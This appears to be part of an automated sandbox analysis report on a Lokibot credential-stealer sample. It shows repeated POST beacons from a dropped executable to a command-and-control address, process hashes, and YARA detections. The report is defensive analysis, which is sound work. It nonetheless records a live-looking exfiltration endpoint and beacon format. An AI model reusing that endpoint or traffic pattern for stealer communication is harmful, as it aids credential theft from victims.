                44192.168.2.64988937.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:04:59.232856035 CEST8957OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:04:59.311464071 CEST8958INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:04:59 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.64977237.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:17.152559042 CEST1132OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:17.233311892 CEST1133INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:17 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.2.64977337.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:18.475481033 CEST1133OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:18.553556919 CEST1134INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:18 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.2.64977437.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:19.667258978 CEST1135OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:19.744927883 CEST1135INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:19 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.2.64977537.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:21.002481937 CEST1136OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:21.096854925 CEST1136INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:21 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.2.64977737.0.11.22780C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                TimestampkBytes transferredDirectionData
                May 5, 2022 09:03:23.742146969 CEST1162OUTPOST /sarag/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 37.0.11.227
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 4E024674
                Content-Length: 169
                Connection: close
                May 5, 2022 09:03:23.816864014 CEST1163INHTTP/1.0 404 Not Found
                Date: Thu, 05 May 2022 07:03:23 GMT
                Server: Apache
                Status: 404 Not Found
                Content-Length: 23
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Click to jump to process

                Target ID:0
                Start time:09:02:53
                Start date:05/05/2022
                Path:C:\Users\user\Desktop\vNcHHC1HKe.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\vNcHHC1HKe.exe"
                Imagebase:0x400000
                File size:126888 bytes
                MD5 hash:8C7E9D4D5F172854A531A86D34AF2C8C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:1
                Start time:09:02:55
                Start date:05/05/2022
                Path:C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
                Imagebase:0x400000
                File size:5632 bytes
                MD5 hash:8B30D9F0EE85F71C5599DCB7701CE2D8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Target ID:3
                Start time:09:02:56
                Start date:05/05/2022
                Path:C:\Users\user\AppData\Local\Temp\dtlrkp.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Local\Temp\dtlrkp.exe C:\Users\user\AppData\Local\Temp\hzuplybmb
                Imagebase:0x400000
                File size:5632 bytes
                MD5 hash:8B30D9F0EE85F71C5599DCB7701CE2D8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                No disassembly